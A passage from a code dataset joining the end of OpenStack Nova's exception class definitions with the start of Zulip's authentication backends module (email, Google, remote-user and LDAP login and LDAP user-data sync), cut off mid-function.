class SecurityGroupNotExistsForInstance(Invalid):
message = _("Security group %(security_group_id)s is not associated with"
" the instance %(instance_id)s")
class SecurityGroupDefaultRuleNotFound(Invalid):
message = _("Security group default rule (%rule_id)s not found.")
class SecurityGroupCannotBeApplied(Invalid):
message = _("Network requires port_security_enabled and subnet associated"
" in order to apply security groups.")
class NoUniqueMatch(NovaException):
message = _("No Unique Match Found.")
code = 409
class MigrationNotFound(NotFound):
message = _("Migration %(migration_id)s could not be found.")
class MigrationNotFoundByStatus(MigrationNotFound):
message = _("Migration not found for instance %(instance_id)s "
"with status %(status)s.")
class ConsolePoolNotFound(NotFound):
message = _("Console pool %(pool_id)s could not be found.")
class ConsolePoolNotFoundForHostType(NotFound):
message = _("Console pool of type %(console_type)s "
"for compute host %(compute_host)s "
"on proxy host %(host)s not found.")
class ConsoleNotFound(NotFound):
message = _("Console %(console_id)s could not be found.")
class ConsoleNotFoundForInstance(ConsoleNotFound):
message = _("Console for instance %(instance_uuid)s could not be found.")
class ConsoleNotFoundInPoolForInstance(ConsoleNotFound):
message = _("Console for instance %(instance_uuid)s "
"in pool %(pool_id)s could not be found.")
class ConsoleTypeInvalid(Invalid):
message = _("Invalid console type %(console_type)s")
class InstanceTypeNotFound(NotFound):
message = _("Instance type %(instance_type_id)s could not be found.")
class InstanceTypeNotFoundByName(InstanceTypeNotFound):
message = _("Instance type with name %(instance_type_name)s "
"could not be found.")
class FlavorNotFound(NotFound):
message = _("Flavor %(flavor_id)s could not be found.")
class FlavorAccessNotFound(NotFound):
message = _("Flavor access not found for %(flavor_id)s / "
"%(project_id)s combination.")
class CellNotFound(NotFound):
message = _("Cell %(cell_name)s doesn't exist.")
class CellRoutingInconsistency(NovaException):
message = _("Inconsistency in cell routing: %(reason)s")
class CellServiceAPIMethodNotFound(NotFound):
message = _("Service API method not found: %(detail)s")
class CellTimeout(NotFound):
message = _("Timeout waiting for response from cell")
class CellMaxHopCountReached(NovaException):
message = _("Cell message has reached maximum hop count: %(hop_count)s")
class NoCellsAvailable(NovaException):
message = _("No cells available matching scheduling criteria.")
class CellError(NovaException):
message = _("Exception received during cell processing: %(exc_name)s.")
class InstanceUnknownCell(NotFound):
message = _("Cell is not known for instance %(instance_uuid)s")
class SchedulerHostFilterNotFound(NotFound):
message = _("Scheduler Host Filter %(filter_name)s could not be found.")
class InstanceMetadataNotFound(NotFound):
message = _("Instance %(instance_uuid)s has no metadata with "
"key %(metadata_key)s.")
class InstanceSystemMetadataNotFound(NotFound):
message = _("Instance %(instance_uuid)s has no system metadata with "
"key %(metadata_key)s.")
class InstanceTypeExtraSpecsNotFound(NotFound):
message = _("Instance Type %(instance_type_id)s has no extra specs with "
"key %(extra_specs_key)s.")
class FileNotFound(NotFound):
message = _("File %(file_path)s could not be found.")
class NoFilesFound(NotFound):
message = _("Zero files could be found.")
class SwitchNotFoundForNetworkAdapter(NotFound):
message = _("Virtual switch associated with the "
"network adapter %(adapter)s not found.")
class NetworkAdapterNotFound(NotFound):
message = _("Network adapter %(adapter)s could not be found.")
class ClassNotFound(NotFound):
message = _("Class %(class_name)s could not be found: %(exception)s")
class NotAllowed(NovaException):
message = _("Action not allowed.")
class ImageRotationNotAllowed(NovaException):
message = _("Rotation is not allowed for snapshots")
class RotationRequiredForBackup(NovaException):
message = _("Rotation param is required for backup image_type")
class KeyPairExists(Duplicate):
message = _("Key pair %(key_name)s already exists.")
class InstanceExists(Duplicate):
message = _("Instance %(name)s already exists.")
class InstanceTypeExists(Duplicate):
message = _("Instance Type with name %(name)s already exists.")
class InstanceTypeIdExists(Duplicate):
message = _("Instance Type with ID %(flavor_id)s already exists.")
class FlavorAccessExists(Duplicate):
message = _("Flavor access alreay exists for flavor %(flavor_id)s "
"and project %(project_id)s combination.")
class InvalidSharedStorage(NovaException):
message = _("%(path)s is not on shared storage: %(reason)s")
class InvalidLocalStorage(NovaException):
message = _("%(path)s is not on local storage: %(reason)s")
class MigrationError(NovaException):
message = _("Migration error") + ": %(reason)s"
class MalformedRequestBody(NovaException):
message = _("Malformed message body: %(reason)s")
# NOTE(johannes): NotFound should only be used when a 404 error is
# appropriate to be returned
class ConfigNotFound(NovaException):
message = _("Could not find config at %(path)s")
class PasteAppNotFound(NovaException):
message = _("Could not load paste app '%(name)s' from %(path)s")
class CannotResizeToSameFlavor(NovaException):
message = _("When resizing, instances must change flavor!")
class ResizeError(NovaException):
message = _("Resize error: %(reason)s")
class ImageTooLarge(NovaException):
message = _("Image is larger than instance type allows")
class InstanceTypeMemoryTooSmall(NovaException):
message = _("Instance type's memory is too small for requested image.")
class InstanceTypeDiskTooSmall(NovaException):
message = _("Instance type's disk is too small for requested image.")
class InsufficientFreeMemory(NovaException):
message = _("Insufficient free memory on compute node to start %(uuid)s.")
class CouldNotFetchMetrics(NovaException):
message = _("Could not fetch bandwidth/cpu/disk metrics for this host.")
class NoValidHost(NovaException):
message = _("No valid host was found. %(reason)s")
class QuotaError(NovaException):
message = _("Quota exceeded") + ": code=%(code)s"
code = 413
headers = {'Retry-After': 0}
safe = True
class TooManyInstances(QuotaError):
message = _("Quota exceeded for %(overs)s: Requested %(req)s,"
" but already used %(used)d of %(allowed)d %(resource)s")
class FloatingIpLimitExceeded(QuotaError):
message = _("Maximum number of floating ips exceeded")
class FixedIpLimitExceeded(QuotaError):
message = _("Maximum number of fixed ips exceeded")
class MetadataLimitExceeded(QuotaError):
message = _("Maximum number of metadata items exceeds %(allowed)d")
class OnsetFileLimitExceeded(QuotaError):
message = _("Personality file limit exceeded")
class OnsetFilePathLimitExceeded(QuotaError):
message = _("Personality file path too long")
class OnsetFileContentLimitExceeded(QuotaError):
message = _("Personality file content too long")
class KeypairLimitExceeded(QuotaError):
message = _("Maximum number of key pairs exceeded")
class SecurityGroupLimitExceeded(QuotaError):
message = _("Maximum number of security groups or rules exceeded")
class AggregateError(NovaException):
message = _("Aggregate %(aggregate_id)s: action '%(action)s' "
"caused an error: %(reason)s.")
class AggregateNotFound(NotFound):
message = _("Aggregate %(aggregate_id)s could not be found.")
class AggregateNameExists(Duplicate):
message = _("Aggregate %(aggregate_name)s already exists.")
class AggregateHostNotFound(NotFound):
message = _("Aggregate %(aggregate_id)s has no host %(host)s.")
class AggregateMetadataNotFound(NotFound):
message = _("Aggregate %(aggregate_id)s has no metadata with "
"key %(metadata_key)s.")
class AggregateHostExists(Duplicate):
message = _("Aggregate %(aggregate_id)s already has host %(host)s.")
class InstanceTypeCreateFailed(NovaException):
message = _("Unable to create instance type")
class InstancePasswordSetFailed(NovaException):
message = _("Failed to set admin password on %(instance)s "
"because %(reason)s")
safe = True
class DuplicateVlan(Duplicate):
message = _("Detected existing vlan with id %(vlan)d")
class CidrConflict(NovaException):
message = _("There was a conflict when trying to complete your request.")
code = 409
class InstanceNotFound(NotFound):
message = _("Instance %(instance_id)s could not be found.")
class InstanceInfoCacheNotFound(NotFound):
message = _("Info cache for instance %(instance_uuid)s could not be "
"found.")
class NodeNotFound(NotFound):
message = _("Node %(node_id)s could not be found.")
class NodeNotFoundByUUID(NotFound):
message = _("Node with UUID %(node_uuid)s could not be found.")
class MarkerNotFound(NotFound):
message = _("Marker %(marker)s could not be found.")
class InvalidInstanceIDMalformed(Invalid):
message = _("Invalid id: %(val)s (expecting \"i-...\").")
class CouldNotFetchImage(NovaException):
message = _("Could not fetch image %(image_id)s")
class CouldNotUploadImage(NovaException):
message = _("Could not upload image %(image_id)s")
class TaskAlreadyRunning(NovaException):
message = _("Task %(task_name)s is already running on host %(host)s")
class TaskNotRunning(NovaException):
message = _("Task %(task_name)s is not running on host %(host)s")
class InstanceIsLocked(InstanceInvalidState):
message = _("Instance %(instance_uuid)s is locked")
class ConfigDriveMountFailed(NovaException):
message = _("Could not mount vfat config drive. %(operation)s failed. "
"Error: %(error)s")
class ConfigDriveUnknownFormat(NovaException):
message = _("Unknown config drive format %(format)s. Select one of "
"iso9660 or vfat.")
class InterfaceAttachFailed(Invalid):
message = _("Failed to attach network adapter device to %(instance)s")
class InterfaceDetachFailed(Invalid):
message = _("Failed to detach network adapter device from %(instance)s")
class InstanceUserDataTooLarge(NovaException):
message = _("User data too large. User data must be no larger than "
"%(maxsize)s bytes once base64 encoded. Your data is "
"%(length)d bytes")
class InstanceUserDataMalformed(NovaException):
message = _("User data needs to be valid base 64.")
class UnexpectedTaskStateError(NovaException):
message = _("unexpected task state: expecting %(expected)s but "
"the actual state is %(actual)s")
class InstanceActionNotFound(NovaException):
message = _("Action for request_id %(request_id)s on instance"
" %(instance_uuid)s not found")
class InstanceActionEventNotFound(NovaException):
message = _("Event %(event)s not found for action id %(action_id)s")
class CryptoCAFileNotFound(FileNotFound):
message = _("The CA file for %(project)s could not be found")
class CryptoCRLFileNotFound(FileNotFound):
message = _("The CRL file for %(project)s could not be found")
class InstanceRecreateNotSupported(Invalid):
message = _('Instance recreate is not implemented by this virt driver.')
class ServiceGroupUnavailable(NovaException):
message = _("The service from servicegroup driver %(driver) is "
"temporarily unavailable.")
class DBNotAllowed(NovaException):
message = _('%(binary)s attempted direct database access which is '
'not allowed by policy')
class UnsupportedVirtType(Invalid):
message = _("Virtualization type '%(virt)s' is not supported by "
"this compute driver")
class UnsupportedHardware(Invalid):
message = _("Requested hardware '%(model)s' is not supported by "
"the '%(virt)s' virt driver")
class Base64Exception(NovaException):
message = _("Invalid Base 64 data for file %(path)s")
| apache-2.0 | 1,228,007,779,956,419,300 | 27.251656 | 79 | 0.67241 | false |
rishig/zulip | zproject/backends.py | 1 | 46330 | # Documentation for Zulip's authentication backends is split across a few places:
#
# * https://zulip.readthedocs.io/en/latest/production/authentication-methods.html and
# zproject/prod_settings_template.py have user-level configuration documentation.
# * https://zulip.readthedocs.io/en/latest/subsystems/auth.html has developer-level
# documentation, especially on testing authentication backends in the Zulip
# development environment.
#
# Django upstream's documentation for authentication backends is also
# helpful background. The most important detail to understand for
# reading this file is that the Django authenticate() function will
# call the authenticate methods of all backends registered in
# settings.AUTHENTICATION_BACKENDS that have a function signature
# matching the args/kwargs passed in the authenticate() call.
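# A hedged sketch of that dispatch (variable names are illustrative): a view
# calls Django's authenticate() with keyword arguments, and only backends
# whose authenticate() signature accepts those arguments are tried:
#
#     from django.contrib.auth import authenticate
#     user_profile = authenticate(username=email, password=password,
#                                 realm=realm, return_data=return_data)
#
# That call matches EmailAuthBackend.authenticate() below, while e.g.
# DevAuthBackend (which expects dev_auth_username) is skipped for it.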
import copy
import logging
import magic
from typing import Any, Dict, List, Optional, Set, Tuple, Union
from django_auth_ldap.backend import LDAPBackend, _LDAPUser
from django.contrib.auth import get_backends
from django.contrib.auth.backends import RemoteUserBackend
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from requests import HTTPError
from social_core.backends.github import GithubOAuth2, GithubOrganizationOAuth2, \
GithubTeamOAuth2
from social_core.backends.azuread import AzureADOAuth2
from social_core.backends.base import BaseAuth
from social_core.backends.oauth import BaseOAuth2
from social_core.pipeline.partial import partial
from social_core.exceptions import AuthFailed, SocialAuthBaseException
from zerver.lib.actions import do_create_user, do_reactivate_user, do_deactivate_user, \
do_update_user_custom_profile_data, validate_email_for_realm
from zerver.lib.avatar import is_avatar_new
from zerver.lib.avatar_hash import user_avatar_content_hash
from zerver.lib.dev_ldap_directory import init_fakeldap
from zerver.lib.request import JsonableError
from zerver.lib.users import check_full_name, validate_user_custom_profile_field
from zerver.models import CustomProfileField, DisposableEmailError, DomainNotAllowedForRealmError, \
EmailContainsPlusError, PreregistrationUser, UserProfile, Realm, custom_profile_fields_for_realm, \
email_allowed_for_realm, get_default_stream_groups, get_user_profile_by_id, remote_user_to_email, \
email_to_username, get_realm, get_user_by_delivery_email, supported_auth_backends
# This first batch of methods is used by other code in Zulip to check
# whether a given authentication backend is enabled for a given realm.
# In each case, we need to check both at the server level (via
# `settings.AUTHENTICATION_BACKENDS`, queried via
# `django.contrib.auth.get_backends`) and at the realm level (via the
# `Realm.authentication_methods` BitField).
def pad_method_dict(method_dict: Dict[str, bool]) -> Dict[str, bool]:
"""Pads an authentication methods dict to contain all auth backends
supported by the software, regardless of whether they are
configured on this server"""
for key in AUTH_BACKEND_NAME_MAP:
if key not in method_dict:
method_dict[key] = False
return method_dict
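# Illustrative example (hypothetical dict): for a realm with only Email and
# LDAP configured, pad_method_dict({'Email': True, 'LDAP': True}) fills in
# every other key from AUTH_BACKEND_NAME_MAP with False, so callers can index
# the dict by any supported backend name without a KeyError.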
def auth_enabled_helper(backends_to_check: List[str], realm: Optional[Realm]) -> bool:
if realm is not None:
enabled_method_dict = realm.authentication_methods_dict()
pad_method_dict(enabled_method_dict)
else:
enabled_method_dict = dict((method, True) for method in Realm.AUTHENTICATION_FLAGS)
pad_method_dict(enabled_method_dict)
for supported_backend in supported_auth_backends():
for backend_name in backends_to_check:
backend = AUTH_BACKEND_NAME_MAP[backend_name]
if enabled_method_dict[backend_name] and isinstance(supported_backend, backend):
return True
return False
def ldap_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['LDAP'], realm)
def email_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['Email'], realm)
def password_auth_enabled(realm: Optional[Realm]=None) -> bool:
return ldap_auth_enabled(realm) or email_auth_enabled(realm)
def dev_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['Dev'], realm)
def google_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['Google'], realm)
def github_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['GitHub'], realm)
def any_oauth_backend_enabled(realm: Optional[Realm]=None) -> bool:
"""Used by the login page process to determine whether to show the
'OR' for login with Google"""
return auth_enabled_helper(OAUTH_BACKEND_NAMES, realm)
def require_email_format_usernames(realm: Optional[Realm]=None) -> bool:
if ldap_auth_enabled(realm):
if settings.LDAP_EMAIL_ATTR or settings.LDAP_APPEND_DOMAIN:
return False
return True
def common_get_active_user(email: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
"""This is the core common function used by essentially all
authentication backends to check if there's an active user account
with a given email address in the organization, handling both
user-level and realm-level deactivation correctly.
"""
try:
user_profile = get_user_by_delivery_email(email, realm)
except UserProfile.DoesNotExist:
# If the user doesn't have an account in the target realm, we
# check whether they might have an account in another realm,
# and if so, provide a helpful error message via
# `invalid_subdomain`.
if not UserProfile.objects.filter(delivery_email__iexact=email).exists():
return None
if return_data is not None:
return_data['invalid_subdomain'] = True
return None
if not user_profile.is_active:
if return_data is not None:
if user_profile.is_mirror_dummy:
# Record whether it's a mirror dummy account
return_data['is_mirror_dummy'] = True
return_data['inactive_user'] = True
return None
if user_profile.realm.deactivated:
if return_data is not None:
return_data['inactive_realm'] = True
return None
return user_profile
class ZulipAuthMixin:
"""This common mixin is used to override Django's default behavior for
looking up a logged-in user by ID to use a version that fetches
from memcached before checking the database (avoiding a database
query in most cases).
"""
def get_user(self, user_profile_id: int) -> Optional[UserProfile]:
"""Override the Django method for getting a UserProfile object from
        the user_profile_id."""
try:
return get_user_profile_by_id(user_profile_id)
except UserProfile.DoesNotExist:
return None
class ZulipDummyBackend(ZulipAuthMixin):
"""Used when we want to log you in without checking any
authentication (i.e. new user registration or when otherwise
authentication has already been checked earlier in the process).
We ensure that this backend only ever successfully authenticates
when explicitly requested by including the use_dummy_backend kwarg.
"""
def authenticate(self, *, username: str, realm: Realm,
use_dummy_backend: bool=False,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
if use_dummy_backend:
return common_get_active_user(username, realm, return_data)
return None
class EmailAuthBackend(ZulipAuthMixin):
"""
Email+Password Authentication Backend (the default).
Allows a user to sign in using an email/password pair.
"""
def authenticate(self, *, username: str, password: str,
realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
""" Authenticate a user based on email address as the user name. """
if not password_auth_enabled(realm):
if return_data is not None:
return_data['password_auth_disabled'] = True
return None
if not email_auth_enabled(realm):
if return_data is not None:
return_data['email_auth_disabled'] = True
return None
user_profile = common_get_active_user(username, realm, return_data=return_data)
if user_profile is None:
return None
if user_profile.check_password(password):
return user_profile
return None
class GoogleMobileOauth2Backend(ZulipAuthMixin):
"""
Google Apps authentication for the legacy Android app.
    ZulipDummyBackend is what's actually used for our modern Google auth,
both for web and mobile (the latter via the mobile_flow_otp feature).
Allows a user to sign in using a Google-issued OAuth2 token.
Ref:
https://developers.google.com/+/mobile/android/sign-in#server-side_access_for_your_app
https://developers.google.com/accounts/docs/CrossClientAuth#offlineAccess
"""
def authenticate(self, *, google_oauth2_token: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
# We lazily import apiclient as part of optimizing the base
# import time for a Zulip management command, since it's only
# used in this one code path and takes 30-50ms to import.
from apiclient.sample_tools import client as googleapiclient
from oauth2client.crypt import AppIdentityError
if return_data is None:
return_data = {}
if not google_auth_enabled(realm=realm):
return_data["google_auth_disabled"] = True
return None
try:
token_payload = googleapiclient.verify_id_token(google_oauth2_token, settings.GOOGLE_CLIENT_ID)
except AppIdentityError:
return None
if token_payload["email_verified"] not in (True, "true"):
return_data["valid_attestation"] = False
return None
return_data["valid_attestation"] = True
return common_get_active_user(token_payload["email"], realm, return_data)
class ZulipRemoteUserBackend(RemoteUserBackend):
"""Authentication backend that reads the Apache REMOTE_USER variable.
Used primarily in enterprise environments with an SSO solution
that has an Apache REMOTE_USER integration. For manual testing, see
https://zulip.readthedocs.io/en/latest/production/authentication-methods.html
See also remote_user_sso in zerver/views/auth.py.
"""
create_unknown_user = False
def authenticate(self, *, remote_user: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
if not auth_enabled_helper(["RemoteUser"], realm):
return None
email = remote_user_to_email(remote_user)
return common_get_active_user(email, realm, return_data=return_data)
def is_valid_email(email: str) -> bool:
try:
validate_email(email)
except ValidationError:
return False
return True
def email_belongs_to_ldap(realm: Realm, email: str) -> bool:
"""Used to make determinations on whether a user's email address is
managed by LDAP. For environments using both LDAP and
Email+Password authentication, we do not allow EmailAuthBackend
authentication for email addresses managed by LDAP (to avoid a
    security issue where one could create separate credentials for an LDAP
user), and this function is used to enforce that rule.
"""
if not ldap_auth_enabled(realm):
return False
# If we don't have an LDAP domain, it's impossible to tell which
# accounts are LDAP accounts, so treat all of them as LDAP
# accounts
if not settings.LDAP_APPEND_DOMAIN:
return True
# Otherwise, check if the email ends with LDAP_APPEND_DOMAIN
return email.strip().lower().endswith("@" + settings.LDAP_APPEND_DOMAIN)
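# Illustrative behaviour (hypothetical domain, assuming LDAP auth is enabled
# for the realm): with LDAP_APPEND_DOMAIN set to "example.com",
# email_belongs_to_ldap(realm, "alice@example.com") is True and
# email_belongs_to_ldap(realm, "bob@other.com") is False; with no
# LDAP_APPEND_DOMAIN configured, every address is treated as LDAP-managed.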
class ZulipLDAPException(_LDAPUser.AuthenticationFailed):
"""Since this inherits from _LDAPUser.AuthenticationFailed, these will
be caught and logged at debug level inside django-auth-ldap's authenticate()"""
pass
class ZulipLDAPExceptionOutsideDomain(ZulipLDAPException):
pass
class ZulipLDAPConfigurationError(Exception):
pass
LDAP_USER_ACCOUNT_CONTROL_DISABLED_MASK = 2
class ZulipLDAPAuthBackendBase(ZulipAuthMixin, LDAPBackend):
"""Common code between LDAP authentication (ZulipLDAPAuthBackend) and
using LDAP just to sync user data (ZulipLDAPUserPopulator).
To fully understand our LDAP backend, you may want to skim
django_auth_ldap/backend.py from the upstream django-auth-ldap
library. It's not a lot of code, and searching around in that
file makes the flow for LDAP authentication clear.
"""
def __init__(self) -> None:
# Used to initialize a fake LDAP directly for both manual
# and automated testing in a development environment where
# there is no actual LDAP server.
if settings.DEVELOPMENT and settings.FAKE_LDAP_MODE: # nocoverage
init_fakeldap()
# Disable django-auth-ldap's permissions functions -- we don't use
# the standard Django user/group permissions system because they
# are prone to performance issues.
def has_perm(self, user: Optional[UserProfile], perm: Any, obj: Any=None) -> bool:
return False
def has_module_perms(self, user: Optional[UserProfile], app_label: Optional[str]) -> bool:
return False
def get_all_permissions(self, user: Optional[UserProfile], obj: Any=None) -> Set[Any]:
return set()
def get_group_permissions(self, user: Optional[UserProfile], obj: Any=None) -> Set[Any]:
return set()
def django_to_ldap_username(self, username: str) -> str:
if settings.LDAP_APPEND_DOMAIN:
if is_valid_email(username):
if not username.endswith("@" + settings.LDAP_APPEND_DOMAIN):
raise ZulipLDAPExceptionOutsideDomain("Email %s does not match LDAP domain %s." % (
username, settings.LDAP_APPEND_DOMAIN))
return email_to_username(username)
return username
def ldap_to_django_username(self, username: str) -> str:
if settings.LDAP_APPEND_DOMAIN:
return "@".join((username, settings.LDAP_APPEND_DOMAIN))
return username
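    # Round-trip sketch (hypothetical domain): with LDAP_APPEND_DOMAIN set to
    # "example.com", django_to_ldap_username("alice@example.com") returns
    # "alice" and ldap_to_django_username("alice") returns
    # "alice@example.com"; without LDAP_APPEND_DOMAIN both are pass-throughs.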
def sync_avatar_from_ldap(self, user: UserProfile, ldap_user: _LDAPUser) -> None:
if 'avatar' in settings.AUTH_LDAP_USER_ATTR_MAP:
# We do local imports here to avoid import loops
from zerver.lib.upload import upload_avatar_image
from zerver.lib.actions import do_change_avatar_fields
from io import BytesIO
avatar_attr_name = settings.AUTH_LDAP_USER_ATTR_MAP['avatar']
if avatar_attr_name not in ldap_user.attrs: # nocoverage
# If this specific user doesn't have e.g. a
# thumbnailPhoto set in LDAP, just skip that user.
return
ldap_avatar = ldap_user.attrs[avatar_attr_name][0]
avatar_changed = is_avatar_new(ldap_avatar, user)
if not avatar_changed:
# Don't do work to replace the avatar with itself.
return
io = BytesIO(ldap_avatar)
# Structurally, to make the S3 backend happy, we need to
# provide a Content-Type; since that isn't specified in
# any metadata, we auto-detect it.
content_type = magic.from_buffer(copy.deepcopy(io).read()[0:1024], mime=True)
if content_type.startswith("image/"):
upload_avatar_image(io, user, user, content_type=content_type)
do_change_avatar_fields(user, UserProfile.AVATAR_FROM_USER)
# Update avatar hash.
user.avatar_hash = user_avatar_content_hash(ldap_avatar)
user.save(update_fields=["avatar_hash"])
else:
logging.warning("Could not parse %s field for user %s" %
(avatar_attr_name, user.id))
def is_account_control_disabled_user(self, ldap_user: _LDAPUser) -> bool:
"""Implements the userAccountControl check for whether a user has been
disabled in an Active Directory server being integrated with
Zulip via LDAP."""
account_control_value = ldap_user.attrs[settings.AUTH_LDAP_USER_ATTR_MAP['userAccountControl']][0]
ldap_disabled = bool(int(account_control_value) & LDAP_USER_ACCOUNT_CONTROL_DISABLED_MASK)
return ldap_disabled
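    # Worked example (hypothetical values): an Active Directory
    # userAccountControl of 514 (0x202) has the 0x2 "account disabled" bit
    # set, so 514 & 2 == 2 and the user is treated as deactivated; a typical
    # enabled value of 512 (0x200) gives 512 & 2 == 0.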
@classmethod
def get_mapped_name(cls, ldap_user: _LDAPUser) -> Tuple[str, str]:
"""Constructs the user's Zulip full_name and short_name fields from
the LDAP data"""
if "full_name" in settings.AUTH_LDAP_USER_ATTR_MAP:
full_name_attr = settings.AUTH_LDAP_USER_ATTR_MAP["full_name"]
short_name = full_name = ldap_user.attrs[full_name_attr][0]
elif all(key in settings.AUTH_LDAP_USER_ATTR_MAP for key in {"first_name", "last_name"}):
first_name_attr = settings.AUTH_LDAP_USER_ATTR_MAP["first_name"]
last_name_attr = settings.AUTH_LDAP_USER_ATTR_MAP["last_name"]
short_name = ldap_user.attrs[first_name_attr][0]
full_name = short_name + ' ' + ldap_user.attrs[last_name_attr][0]
else:
raise ZulipLDAPException("Missing required mapping for user's full name")
if "short_name" in settings.AUTH_LDAP_USER_ATTR_MAP:
short_name_attr = settings.AUTH_LDAP_USER_ATTR_MAP["short_name"]
short_name = ldap_user.attrs[short_name_attr][0]
return full_name, short_name
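    # Illustrative AUTH_LDAP_USER_ATTR_MAP entries (the LDAP attribute names
    # are examples, not requirements):
    #
    #     AUTH_LDAP_USER_ATTR_MAP = {
    #         "full_name": "cn",
    #         # or instead: "first_name": "givenName", "last_name": "sn",
    #         "short_name": "uid",
    #     }
    #
    # With only first_name/last_name mapped, full_name is built as
    # "<first> <last>" and short_name defaults to the first name unless a
    # "short_name" mapping is also provided.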
def sync_full_name_from_ldap(self, user_profile: UserProfile,
ldap_user: _LDAPUser) -> None:
from zerver.lib.actions import do_change_full_name
full_name, _ = self.get_mapped_name(ldap_user)
if full_name != user_profile.full_name:
try:
full_name = check_full_name(full_name)
except JsonableError as e:
raise ZulipLDAPException(e.msg)
do_change_full_name(user_profile, full_name, None)
def sync_custom_profile_fields_from_ldap(self, user_profile: UserProfile,
ldap_user: _LDAPUser) -> None:
values_by_var_name = {} # type: Dict[str, Union[int, str, List[int]]]
for attr, ldap_attr in settings.AUTH_LDAP_USER_ATTR_MAP.items():
if not attr.startswith('custom_profile_field__'):
continue
var_name = attr.split('custom_profile_field__')[1]
try:
value = ldap_user.attrs[ldap_attr][0]
except KeyError:
# If this user doesn't have this field set then ignore this
# field and continue syncing other fields. `django-auth-ldap`
                # automatically logs an error about the missing field.
continue
values_by_var_name[var_name] = value
fields_by_var_name = {} # type: Dict[str, CustomProfileField]
custom_profile_fields = custom_profile_fields_for_realm(user_profile.realm.id)
for field in custom_profile_fields:
var_name = '_'.join(field.name.lower().split(' '))
fields_by_var_name[var_name] = field
existing_values = {}
for data in user_profile.profile_data:
var_name = '_'.join(data['name'].lower().split(' ')) # type: ignore # data field values can also be int
existing_values[var_name] = data['value']
profile_data = [] # type: List[Dict[str, Union[int, str, List[int]]]]
for var_name, value in values_by_var_name.items():
try:
field = fields_by_var_name[var_name]
except KeyError:
raise ZulipLDAPException('Custom profile field with name %s not found.' % (var_name,))
if existing_values.get(var_name) == value:
continue
result = validate_user_custom_profile_field(user_profile.realm.id, field, value)
if result is not None:
raise ZulipLDAPException('Invalid data for %s field: %s' % (var_name, result))
profile_data.append({
'id': field.id,
'value': value,
})
do_update_user_custom_profile_data(user_profile, profile_data)
def get_or_build_user(self, username: str,
ldap_user: _LDAPUser) -> Tuple[UserProfile, bool]:
"""This is used only in non-authentication contexts such as:
./manage.py sync_ldap_user_data
In authentication contexts, this is overriden in ZulipLDAPAuthBackend.
"""
(user, built) = super().get_or_build_user(username, ldap_user)
self.sync_avatar_from_ldap(user, ldap_user)
self.sync_full_name_from_ldap(user, ldap_user)
self.sync_custom_profile_fields_from_ldap(user, ldap_user)
if 'userAccountControl' in settings.AUTH_LDAP_USER_ATTR_MAP:
user_disabled_in_ldap = self.is_account_control_disabled_user(ldap_user)
if user_disabled_in_ldap and user.is_active:
logging.info("Deactivating user %s because they are disabled in LDAP." %
(user.email,))
do_deactivate_user(user)
return (user, built)
if not user_disabled_in_ldap and not user.is_active:
logging.info("Reactivating user %s because they are not disabled in LDAP." %
(user.email,))
do_reactivate_user(user)
return (user, built)
class ZulipLDAPAuthBackend(ZulipLDAPAuthBackendBase):
REALM_IS_NONE_ERROR = 1
def authenticate(self, *, username: str, password: str, realm: Realm,
prereg_user: Optional[PreregistrationUser]=None,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
self._realm = realm
self._prereg_user = prereg_user
if not ldap_auth_enabled(realm):
return None
try:
username = self.django_to_ldap_username(username)
except ZulipLDAPExceptionOutsideDomain:
if return_data is not None:
return_data['outside_ldap_domain'] = True
return None
# Call into (ultimately) the django-auth-ldap authenticate
# function. This will check the username/password pair
# against the LDAP database, and assuming those are correct,
# end up calling `self.get_or_build_user` with the
# authenticated user's data from LDAP.
return ZulipLDAPAuthBackendBase.authenticate(self,
request=None,
username=username,
password=password)
def get_or_build_user(self, username: str, ldap_user: _LDAPUser) -> Tuple[UserProfile, bool]:
"""The main function of our authentication backend extension of
django-auth-ldap. When this is called (from `authenticate`),
django-auth-ldap will already have verified that the provided
username and password match those in the LDAP database.
This function's responsibility is to check (1) whether the
email address for this user obtained from LDAP has an active
account in this Zulip realm. If so, it will log them in.
Otherwise, to provide a seamless Single Sign-On experience
with LDAP, this function can automatically create a new Zulip
user account in the realm (assuming the realm is configured to
allow that email address to sign up).
"""
return_data = {} # type: Dict[str, Any]
if settings.LDAP_EMAIL_ATTR is not None:
# Get email from ldap attributes.
if settings.LDAP_EMAIL_ATTR not in ldap_user.attrs:
return_data["ldap_missing_attribute"] = settings.LDAP_EMAIL_ATTR
raise ZulipLDAPException("LDAP user doesn't have the needed %s attribute" % (
settings.LDAP_EMAIL_ATTR,))
username = ldap_user.attrs[settings.LDAP_EMAIL_ATTR][0]
if 'userAccountControl' in settings.AUTH_LDAP_USER_ATTR_MAP: # nocoverage
ldap_disabled = self.is_account_control_disabled_user(ldap_user)
if ldap_disabled:
# Treat disabled users as deactivated in Zulip.
return_data["inactive_user"] = True
raise ZulipLDAPException("User has been deactivated")
user_profile = common_get_active_user(username, self._realm, return_data)
if user_profile is not None:
# An existing user, successfully authed; return it.
return user_profile, False
if return_data.get("inactive_realm"):
# This happens if there is a user account in a deactivated realm
raise ZulipLDAPException("Realm has been deactivated")
if return_data.get("inactive_user"):
raise ZulipLDAPException("User has been deactivated")
# An invalid_subdomain `return_data` value here is ignored,
# since that just means we're trying to create an account in a
# second realm on the server (`ldap_auth_enabled(realm)` would
# have been false if this user wasn't meant to have an account
# in this second realm).
if self._realm.deactivated:
# This happens if no account exists, but the realm is
# deactivated, so we shouldn't create a new user account
raise ZulipLDAPException("Realm has been deactivated")
        # Makes sure that the email domain hasn't been restricted for this
# realm. The main thing here is email_allowed_for_realm; but
# we also call validate_email_for_realm just for consistency,
# even though its checks were already done above.
try:
